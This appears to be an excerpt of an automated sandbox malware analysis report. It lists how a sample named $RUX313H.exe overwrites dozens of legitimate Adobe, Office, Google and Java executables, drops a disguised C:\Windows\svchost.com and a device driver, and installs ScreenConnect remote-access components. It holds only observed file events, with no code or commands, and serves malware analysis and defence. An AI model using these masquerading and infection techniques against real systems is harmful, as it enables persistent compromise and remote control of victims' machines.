                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
                          Sample is not signed and drops a device driverShow sources
                          Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
                          Drops executables to the windows directory (C:\Windows) and starts themShow sources
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeExecutable created and started: C:\Windows\svchost.comJump to behavior
                          Drops PE files with a suspicious file extensionShow sources
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Windows\svchost.comJump to dropped file
                          Drops executable to a common third party application directoryShow sources
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Windows\svchost.comJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI13D3.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1045.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFE7.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dllJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11DE.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.Core.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
